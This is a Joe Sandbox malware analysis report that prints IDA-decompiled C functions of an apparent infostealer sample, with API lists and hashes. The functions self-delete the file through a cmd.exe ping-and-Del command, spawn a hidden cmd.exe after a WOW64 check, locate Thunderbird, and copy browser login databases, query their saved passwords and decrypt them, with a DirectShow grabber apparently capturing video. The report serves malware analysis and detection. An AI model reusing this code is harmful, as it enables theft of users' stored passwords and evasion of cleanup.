Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Initialize$CreateInitInstanceSecurityVariant
String ID: Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
API String ID: 2382742315-3227336550
Opcode ID: 62402ba7bd33d16e8a6292d48fd24bb9fa0e578ccdf34bf950ed68674eef350a
Instruction ID: 413e5dc147c1634c4dff850b45b95532733a8f91be9f3a6dc6c026337368d5b1
Opcode Fuzzy Hash: 62402ba7bd33d16e8a6292d48fd24bb9fa0e578ccdf34bf950ed68674eef350a
Instruction Fuzzy Hash: 34410EB4600209BFCB14DB96CC88D9FBBBDEFC9B15B104468F685EB254D771A905CB20

Uniqueness

Uniqueness Score: -1.00%

Function 01032A9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106
processthreadCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E01032A9C() {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				char _v352;
				char _v816;
				char _v817;
				char _v872;
				void* _t59;
				void* _t66;
				void* _t69;

				_t59 = _t66;
				_t69 = _t59;
				E010424D7(_t69 + 0x10);
				if( *((intOrPtr*)(_t69 + 0x68)) != 0) {
					TerminateThread( *0x1189cb4, 0);
				}
				if( *((intOrPtr*)(_t69 + 0x50)) != 0) {
					E01042612(_t69 + 4,  *((intOrPtr*)(_t69 + 8)), _t69 + 0x14, 0x20006, 0);
					E010424F2(_t69 + 4, E010336F7( &_v8, L"Load"));
					E01035FEB(_v8);
					E01042554(_t69 + 4);
				}
				E01031052( &_v92, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetModuleFileNameA(0,  &_v352, 0x104);
				E0103102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);
				E0103102C( &_v817, "\"", 1);
				E0103102C( &_v816,  &_v352, E01031133( &_v352));
				E0103102C(E01031133( &_v352) + 0x38 +  &_v872, "\"", 2);
				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitProcess(0);
			}

0x01032a9c
0x01042d01
0x01042d06
0x01042d10
0x01042d19
0x01042d19
0x01042d22
0x01042d36
0x01042d4b
0x01042d53
0x01042d5a
0x01042d5a
0x01042d66
0x01042d70
0x01042d74
0x01042d7a
0x01042d7b
0x01042d84
0x01042d98
0x01042dac
0x01042dcc
0x01042dec
0x01042e0e
0x01042e1d
0x01042e22
0x01042e25

APIs

Part of subcall function 010424D7: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 010424DE

TerminateThread.KERNEL32(00000000,?,?), ref: 01042D19
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 01042D84
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 01042E0E
CloseHandle.KERNEL32(?), ref: 01042E1D
CloseHandle.KERNEL32(?), ref: 01042E22
ExitProcess.KERNEL32 ref: 01042E25

Strings

Load, xrefs: 01042D3B
cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 01042D92

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
String ID: Load$cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
API String ID: 3630425516-2018186591
Opcode ID: 9a585c9f816b501895cf14b2c9e36d2a704d628d3997f28dedc2506504e84e40
Instruction ID: fdbfa1727f97862c6b719df3fb37894b0f99179d631b6f037f27af737fb3660f
Opcode Fuzzy Hash: 9a585c9f816b501895cf14b2c9e36d2a704d628d3997f28dedc2506504e84e40
Instruction Fuzzy Hash: 113180F2A0061AFFDB11EBA0DDC9EEFB77DEB58300F004465B245A6150DB75AE448BA1

Uniqueness

Uniqueness Score: -1.00%

Function 01043EBA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 75
sleepprocessmemoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E01043EBA() {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				int _t10;
				void* _t23;
				int _t24;
				CHAR* _t26;

				_v8 = 0;
				_t10 = GetCurrentProcess();
				__imp__IsWow64Process(_t10,  &_v8);
				if(_t10 != 0) {
					if(_v8 == 0) {
						_t10 = E0104405F(_t23, __eflags);
						__eflags = _t10;
						if(_t10 != 0) {
							_t24 = _t10;
							goto L6;
						}
					} else {
						_t26 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
						GetWindowsDirectoryA(_t26, 0x104);
						E0103102C( &(_t26[lstrlenA(_t26)]), "\\System32\\cmd.exe", 0x14);
						E01031052( &_v100, 0, 0x44);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t10 = CreateProcessA(_t26, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24);
						if(_t10 != 0) {
							Sleep(0x3e8);
							_t24 = _v24.dwProcessId;
							L6:
							return E01043F7F(_t24);
						}
					}
				}
				return _t10;
			}

0x01043ec9
0x01043ecc
0x01043ed3
0x01043edb
0x01043ee4
0x01043f6a
0x01043f6f
0x01043f71
0x01043f73
0x00000000
0x01043f73
0x01043eea
0x01043efd
0x01043f05
0x01043f1c
0x01043f2b
0x01043f35
0x01043f39
0x01043f3a
0x01043f3b
0x01043f50
0x01043f58
0x01043f5f
0x01043f65
0x01043f75
0x00000000
0x01043f75
0x01043f58
0x01043ee4
0x01043f7e

APIs

GetCurrentProcess.KERNEL32(?,00000000,76B30770,00000000), ref: 01043ECC
IsWow64Process.KERNEL32(00000000), ref: 01043ED3
VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040), ref: 01043EF7
GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 01043F05
lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 01043F13
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 01043F50
Sleep.KERNEL32(000003E8), ref: 01043F5F

Strings

\System32\cmd.exe, xrefs: 01043F0D

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
String ID: \System32\cmd.exe
API String ID: 3151064845-2003734499
Opcode ID: a508ba02c803d7231848afd764bf631daa1e6e2c368755d3d8f8a6d872caa014
Instruction ID: c64970bcd66c65cce35d7f2566082d51840502982745082cd3a12968b7bb76e4
Opcode Fuzzy Hash: a508ba02c803d7231848afd764bf631daa1e6e2c368755d3d8f8a6d872caa014
Instruction Fuzzy Hash: 6B114FF9A00319BFEB209BB89DC9FAF767CEB04645F000434F785E6184DB749D058661

Uniqueness

Uniqueness Score: -1.00%

Function 0103B87D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103B87D(WCHAR* __ecx, char* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				short _v536;
				char* _t32;
				WCHAR* _t33;

				_v12 = 0x104;
				_v16 = 1;
				_t32 = __edx;
				_t33 = __ecx;
				E01031052( &_v536, 0, 0x104);
				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
				lstrcatW( &_v536, _t33);
				if(RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8) != 0) {
					return 0;
				}
				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);
				RegCloseKey(_v8);
				return 1;
			}

0x0103b891
0x0103b89b
0x0103b8a1
0x0103b8a3
0x0103b8a5
0x0103b8b9
0x0103b8c7
0x0103b8e8
0x00000000
0x0103b910
0x0103b8fd
0x0103b906
0x00000000

APIs

lstrcpyW.KERNEL32 ref: 0103B8B9
lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0103B8C7
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,01039E8E,?,00000104,00000000), ref: 0103B8E0
RegQueryValueExW.ADVAPI32(01039E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0103B8FD
RegCloseKey.ADVAPI32(01039E8E,?,00000104,00000000), ref: 0103B906

Strings

Path, xrefs: 0103B8F5
Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0103B8B3
thunderbird.exe, xrefs: 0103B8BF

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValuelstrcatlstrcpy
String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
API String ID: 3135247354-1374996286
Opcode ID: 9581902a8139609d6d088f40c3767553000175e26d3a672ac5f124ea47da5475
Instruction ID: 58b956750a54ae76cb1f37af9f2fc6809f32176f99303c0ed3aded6aa21554b6
Opcode Fuzzy Hash: 9581902a8139609d6d088f40c3767553000175e26d3a672ac5f124ea47da5475
Instruction Fuzzy Hash: 8A111EB694011DBFDB20EAA5DD89FDEB7BCEB54344F0004B6BA45E2144E6759B048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0103BC0D Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 371
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0103BC0D(intOrPtr __ecx, void* __eflags, char _a4, signed int _a8, char _a12, char _a16, intOrPtr _a20) {
				WCHAR* _v12;
				char _v16;
				WCHAR* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				char _v88;
				int _t148;
				intOrPtr* _t160;
				void* _t161;
				char _t165;
				char _t177;
				char _t178;
				char _t188;
				char* _t189;
				char* _t190;
				char* _t191;
				void* _t192;
				void* _t194;
				char _t198;
				char _t223;
				intOrPtr _t233;
				char* _t251;
				char* _t255;
				void* _t322;
				void* _t323;
				void* _t324;
				void* _t325;
				void* _t326;
				void* _t327;
				char _t331;
				WCHAR* _t337;
				intOrPtr _t338;
				void* _t339;
				void* _t340;

				_t343 = __eflags;
				_v24 = _v24 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_t233 = __ecx;
				_t322 = 0x1a;
				_v52 = __ecx;
				E01040C8A( &_v12, _t322, __eflags);
				_t329 = "\\";
				E0103357C( &_v12, _t322, __eflags, "\\");
				_t323 = 8;
				E01033447( &_v12, _t343, E010335B9( &_v48, _t323, _t343));
				E01035FEB(_v48);
				_t336 = L".tmp";
				E0103357C( &_v12, _t323, _t343, L".tmp");
				_t324 = 0x1a;
				E01040C8A( &_v20, _t324, _t343);
				E0103357C( &_v20, _t324, _t343, _t329);
				_t325 = 8;
				E01033447( &_v20, _t343, E010335B9( &_v48, _t325, _t343));
				E01035FEB(_v48);
				E0103357C( &_v20, _t325, _t343, _t336);
				_t344 = _a12;
				_t251 =  &_v48;
				if(_a12 == 0) {
					_push(0x1c);
				} else {
					_push(0x1a);
				}
				_pop(_t326);
				E01033549( &_v24, E01040C8A(_t251, _t326, _t344));
				E01035FEB(_v48);
				E0103357C( &_v24, _t326, _t344, _a4);
				_t345 = _a12;
				_t255 =  &_a12;
				if(_a12 == 0) {
					_push(0x1c);
				} else {
					_push(0x1a);
				}
				_pop(_t327);
				E01033549( &_v28, E01040C8A(_t255, _t327, _t345));
				E01035FEB(_a12);
				E0103357C( &_v28, _t327, _t345, _a8);
				_t148 = PathFileExistsW(_v24);
				_t337 = _v28;
				if(_t148 == 0 || PathFileExistsW(_t337) == 0 || CopyFileW(_v24, _v12, 0) == 0 || CopyFileW(_t337, _v20, 0) == 0) {
					L12:
					_t331 = 0;
					goto L13;
				} else {
					E01033549( &_v24,  &_v12);
					_t160 = E01033666( &_v24,  &_a12);
					_t161 =  *((intOrPtr*)(_t233 + 0x30))( *_t160,  &_v56);
					_t268 = _a12;
					E01035FEB(_a12);
					if(_t161 == 0) {
						_v32 = _v32 & 0x00000000;
						_a8 = _a8 & 0x00000000;
						_t165 = E0103C63E(_t268, _t268,  &_v32,  &_a8);
						_t340 = _t339 + 0x10;
						_t331 = 1;
						__eflags = _t165;
						if(_t165 == 0) {
							L36:
							 *((intOrPtr*)(_t233 + 0x60))();
							 *((intOrPtr*)(_t233 + 0x34))();
							E0103373F(_t340,  &_v12);
							E0104142A(_v56);
							E0103373F(_t340,  &_v20);
							E0104142A(_v16);
							L13:
							E01035FEB(_v20);
							E01035FEB(_v12);
							E01035FEB(_t337);
							E01035FEB(_v24);
							return _t331;
						}
						__eflags = _a16;
						_t176 =  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins";
						_t177 =  *((intOrPtr*)(_t233 + 0x38))(_v56,  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins", 0xffffffff,  &_v16, 0);
						_t340 = _t340 + 0x14;
						__eflags = _t177;
						if(_t177 != 0) {
							goto L36;
						}
						_t178 =  *((intOrPtr*)(_t233 + 0x44))(_v16);
						_pop(_t268);
						__eflags = _t178 - 0x64;
						if(_t178 != 0x64) {
							L35:
							__eflags = _t178;
							if(_t178 != 0) {
								goto L11;
							}
							goto L36;
						}
						_t338 = _t233;
						do {
							_a16 = E01035F68(_t331);
							_t335 = E01035F68(_t331);
							_a4 = _t186;
							_v48 = E01035F68(1);
							_t188 = E01035F68(1);
							_a12 = _t188;
							_t189 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 0);
							__eflags =  *_t189;
							if( *_t189 != 0) {
								E01033237( &_a4, E010334D1( &_v60, _t189));
								E01035FEB(_v60);
								_t335 = _a4;
							}
							_t190 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 1);
							__eflags =  *_t190;
							if( *_t190 != 0) {
								E01033237( &_v48, E010334D1( &_v64, _t190));
								E01035FEB(_v64);
							}
							_t191 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 2);
							__eflags =  *_t191;
							if( *_t191 != 0) {
								E01033237( &_a12, E010334D1( &_v68, _t191));
								E01035FEB(_v68);
							}
							_t192 =  *((intOrPtr*)(_t338 + 0x5c))(_v16, 3, _v32, _a8);
							_t194 = E0103C6BD( *((intOrPtr*)(_t338 + 0x54))(), _t192, _v16, 3);
							_t340 = _t340 - 0xc + 0x24;
							E01033237( &_a16, E010334D1( &_v72, _t194));
							E01035FEB(_v72);
							_t198 = E0103319E( &_a12);
							__eflags = _t198;
							if(_t198 > 0) {
								L26:
								_v88 = 0;
								_v84 = 0;
								_v80 = 0;
								__eflags = E0103319E( &_a4);
								if(__eflags > 0) {
									E01033549( &_v88, E010331AF( &_a4, __eflags,  &_v36));
									E01035FEB(_v36);
									_v36 = 0;
								}
								__eflags = E0103319E( &_a12);
								if(__eflags > 0) {
									E01033549( &_v84, E010331AF( &_a12, __eflags,  &_v40));
									E01035FEB(_v40);
									_v40 = 0;
								}
								__eflags = E0103319E( &_a16);
								if(__eflags != 0) {
									E01033549( &_v80, E010331AF( &_a16, __eflags,  &_v44));
									E01035FEB(_v44);
									_v44 = 0;
								}
								_t340 = _t340 - 0x10;
								_v76 = _a20;
								E01031FF2(_t340,  &_v88);
								E01032028(_t338);
								E01031441( &_v88);
							} else {
								_t223 = E0103319E( &_a16);
								__eflags = _t223;
								if(_t223 <= 0) {
									goto L33;
								}
								goto L26;
							}
							L33:
							E01035FEB(_a12);
							E01035FEB(_v48);
							E01035FEB(_t335);
							E01035FEB(_a16);
							_t178 =  *((intOrPtr*)(_t338 + 0x44))(_v16);
							_pop(_t268);
							_t331 = 1;
							__eflags = _t178 - 0x64;
						} while (_t178 == 0x64);
						_t337 = _v28;
						_t233 = _v52;
						goto L35;
					}
					L11:
					E0103373F(_t340,  &_v12);
					E0104142A(_t268);
					E0103373F(_t340,  &_v20);
					E0104142A();
					goto L12;
				}
			}

0x0103bc0d
0x0103bc13
0x0103bc17
0x0103bc1e
0x0103bc25
0x0103bc26
0x0103bc29
0x0103bc2e
0x0103bc37
0x0103bc3e
0x0103bc4b
0x0103bc53
0x0103bc58
0x0103bc61
0x0103bc68
0x0103bc6c
0x0103bc75
0x0103bc7c
0x0103bc89
0x0103bc91
0x0103bc9a
0x0103bc9f
0x0103bca3
0x0103bca6
0x0103bcac
0x0103bca8
0x0103bca8
0x0103bca8
0x0103bcae
0x0103bcb8
0x0103bcc0
0x0103bccb
0x0103bcd0
0x0103bcd4
0x0103bcd7
0x0103bcdd
0x0103bcd9
0x0103bcd9
0x0103bcd9
0x0103bcdf
0x0103bce9
0x0103bcf1
0x0103bcfc
0x0103bd0a
0x0103bd0c
0x0103bd11
0x0103bd8d
0x0103bd8d
0x00000000
0x0103bd3a
0x0103bd41
0x0103bd4d
0x0103bd58
0x0103bd5d
0x0103bd62
0x0103bd69
0x0103bdb7
0x0103bdbe
0x0103bdcb
0x0103bdd2
0x0103bdd5
0x0103bdd6
0x0103bdd8
0x0103c017
0x0103c01a
0x0103c021
0x0103c02a
0x0103c02f
0x0103c03a
0x0103c03f
0x0103bd8f
0x0103bd92
0x0103bd9a
0x0103bda1
0x0103bda9
0x0103bdb4
0x0103bdb4
0x0103bdde
0x0103bdf4
0x0103bdfb
0x0103bdfe
0x0103be01
0x0103be03
0x00000000
0x00000000
0x0103be0c
0x0103be0f
0x0103be10
0x0103be13
0x0103c00f
0x0103c00f
0x0103c011
0x00000000
0x00000000
0x00000000
0x0103c011
0x0103be19
0x0103be1b
0x0103be24
0x0103be2e
0x0103be31
0x0103be3d
0x0103be40
0x0103be4a
0x0103be4d
0x0103be52
0x0103be55
0x0103be64
0x0103be6c
0x0103be71
0x0103be71
0x0103be78
0x0103be7d
0x0103be80
0x0103be8f
0x0103be97
0x0103be97
0x0103bea1
0x0103bea6
0x0103bea9
0x0103beb8
0x0103bec0
0x0103bec0
0x0103bed3
0x0103bee7
0x0103beec
0x0103befc
0x0103bf04
0x0103bf0c
0x0103bf11
0x0103bf13
0x0103bf25
0x0103bf2a
0x0103bf2d
0x0103bf30
0x0103bf38
0x0103bf3a
0x0103bf4c
0x0103bf54
0x0103bf59
0x0103bf59
0x0103bf64
0x0103bf66
0x0103bf78
0x0103bf80
0x0103bf85
0x0103bf85
0x0103bf90
0x0103bf92
0x0103bfa4
0x0103bfac
0x0103bfb1
0x0103bfb1
0x0103bfb7
0x0103bfba
0x0103bfc3
0x0103bfca
0x0103bfd2
0x0103bf15
0x0103bf18
0x0103bf1d
0x0103bf1f
0x00000000
0x00000000
0x00000000
0x0103bf1f
0x0103bfd7
0x0103bfda
0x0103bfe2
0x0103bfe9
0x0103bff1
0x0103bff9
0x0103bffc
0x0103bfff
0x0103c000
0x0103c000
0x0103c009
0x0103c00c
0x00000000
0x0103c00c
0x0103bd6b
0x0103bd72
0x0103bd77
0x0103bd82
0x0103bd87
0x00000000
0x0103bd8c

APIs

Part of subcall function 01040C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 01040CBB

Part of subcall function 01033447: lstrcatW.KERNEL32(00000000,76B30770), ref: 01033477

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

PathFileExistsW.SHLWAPI(00000000,?,00000000,00000000,00000000,.tmp,00000000,010476A4,.tmp,00000000,010476A4,?,00000000), ref: 0103BD0A
PathFileExistsW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0103B9AA), ref: 0103BD14
CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0103BD28
CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0103BD34

Part of subcall function 0103C63E: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0103BDD0,?,?,00000000,?), ref: 0103C6A8
Part of subcall function 0103C63E: LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,0103BDD0,?,?,00000000,?), ref: 0103C6B1

Part of subcall function 0103C6BD: LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0103C745
Part of subcall function 0103C6BD: BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0103C773
Part of subcall function 0103C6BD: LocalFree.KERNEL32(?), ref: 0103C7FB

Part of subcall function 010334D1: lstrlenA.KERNEL32(?,76B30770,?,01035B8D,.bss,00000000), ref: 010334DA
Part of subcall function 010334D1: lstrlenA.KERNEL32(?,?,01035B8D,.bss,00000000), ref: 010334E7
Part of subcall function 010334D1: lstrcpyA.KERNEL32(00000000,?,?,01035B8D,.bss,00000000), ref: 010334FA

Part of subcall function 01033237: lstrcatA.KERNEL32(00000000,76B30770,?,00000000,?,010336D6,00000000,00000000,?,01034FB1,?,?,?,?,?,00000000), ref: 01033263

Part of subcall function 0103319E: lstrlenA.KERNEL32(00000000,010331C6,76B30770,00000000,00000000,?,010333EE,01033620,00000000,-00000001,76B30770,?,01033620,00000000,?,?), ref: 010331A5

Strings

.tmp, xrefs: 0103BC58, 0103BC60, 0103BC96
select signon_realm, origin_url, username_value, password_value from wow_logins, xrefs: 0103BDE8
select signon_realm, origin_url, username_value, password_value from logins, xrefs: 0103BDED, 0103BDF7

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: FileFreeLocal$Pathlstrlen$CopyExistslstrcat$AllocCryptDecryptFolderSpecialVirtuallstrcpy
String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins
API String ID: 881303001-3832748974
Opcode ID: b2b2c617255b7eb68c3f1cdbfa49ccfc46eb97352e8577614a7cc5e544e196d4
Instruction ID: 2ebe1a7a8b2b8cbcc4ba1dad0c24eed6dcd4d9b282837ee47c816d1624657bd8
Opcode Fuzzy Hash: b2b2c617255b7eb68c3f1cdbfa49ccfc46eb97352e8577614a7cc5e544e196d4
Instruction Fuzzy Hash: 43D1427290010AAFDF15FFA5DD95EEEB77DBFA4200F104169E592AA1E0DF30AA05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 010446E1 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 175
comCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E010446E1(intOrPtr __ecx, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v58;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v128;
				char _v144;
				intOrPtr _v148;
				char _v216;
				intOrPtr* _t63;
				intOrPtr* _t76;
				intOrPtr* _t80;
				signed int _t82;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				signed int _t103;
				intOrPtr* _t115;
				intOrPtr* _t118;
				void* _t121;

				_v28 = __ecx;
				__imp__CoInitialize(0);
				_v12 = 0;
				_v16 = 0;
				_t118 = 0;
				_v20 = 0;
				_t89 = 0;
				_v24 = 0;
				_t115 = __imp__CoCreateInstance;
				_t63 =  *_t115(0x10475c0, 0, 1, 0x104a79c,  &_v24);
				_t91 = _v24;
				if(_t91 == 0) {
					L8:
					_t92 = _v12;
					if(_t92 != 0) {
						_t63 =  *((intOrPtr*)( *_t92 + 8))(_t92);
						_v12 = _v12 & 0x00000000;
					}
					L10:
					_t93 = _v16;
					if(_t93 != 0) {
						_t63 =  *((intOrPtr*)( *_t93 + 8))(_t93);
						_v16 = _v16 & 0x00000000;
					}
					_t94 = _v20;
					if(_t94 != 0) {
						_t63 =  *((intOrPtr*)( *_t94 + 8))(_t94);
						_v20 = _v20 & 0x00000000;
					}
					_t95 = _v24;
					if(_t95 != 0) {
						_t63 =  *((intOrPtr*)( *_t95 + 8))(_t95);
						_v24 = _v24 & 0x00000000;
					}
					if(_t118 != 0) {
						_t63 =  *((intOrPtr*)( *_t118 + 8))(_t118);
					}
					if(_t89 != 0) {
						_t63 =  *((intOrPtr*)( *_t89 + 8))(_t89);
					}
					__imp__CoUninitialize();
					return _t63;
				}
				_t63 =  *((intOrPtr*)( *_t91))(_t91, 0x10475a0,  &_v16);
				_t96 = _v16;
				if(_t96 == 0) {
					goto L8;
				}
				 *((intOrPtr*)( *_t96 + 4))(_t96);
				_t63 = E01044A12(_a4,  &_v12);
				if(_v12 == 0) {
					goto L10;
				}
				_t63 =  *_t115(0x1047610, 0, 1, 0x104a78c,  &_v20);
				_t98 = _v20;
				if(_t98 != 0) {
					 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v12, L"Source");
					_t76 = _v20;
					 *((intOrPtr*)( *_t76 + 0xc))(_t76, _v16, L"Grabber");
					E01031052( &_v144, 0, 0x48);
					_t80 = _v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_t80 + 0x10))(_t80,  &_v144);
					_t63 = E0104462F();
					_t118 = _t63;
					if(_t118 != 0) {
						_t63 = E0104464B();
						_t89 = _t63;
						if(_t89 != 0) {
							_t103 = _v20;
							_t63 =  *((intOrPtr*)( *_t103 + 0x2c))(_t103, _t118, _t89);
							if(_t63 >= 0) {
								_t82 = _v24;
								 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v216);
								_t105 = _v148;
								_t113 = _v148 + 0x30;
								E0103102C(_t121 + _v148 + 0x30 - _t105 - 0x74, _v148 + 0x30, 0x28);
								E01044492( &_v216);
								_t63 = E01044AD1(_v28, _t113, _a4, _v64, _v68, _v58);
							}
						}
					}
				}
				goto L8;
			}

0x010446ef
0x010446f3
0x010446fc
0x01044708
0x0104470b
0x0104470d
0x01044710
0x01044712
0x01044715
0x01044720
0x01044722
0x01044727
0x01044851
0x01044851
0x01044856
0x0104485b
0x0104485e
0x0104485e
0x01044862
0x01044862
0x01044867
0x0104486c
0x0104486f
0x0104486f
0x01044873
0x01044878
0x0104487d
0x01044880
0x01044880
0x01044884
0x01044889
0x0104488e
0x01044891
0x01044891
0x01044897
0x0104489c
0x0104489c
0x010448a1
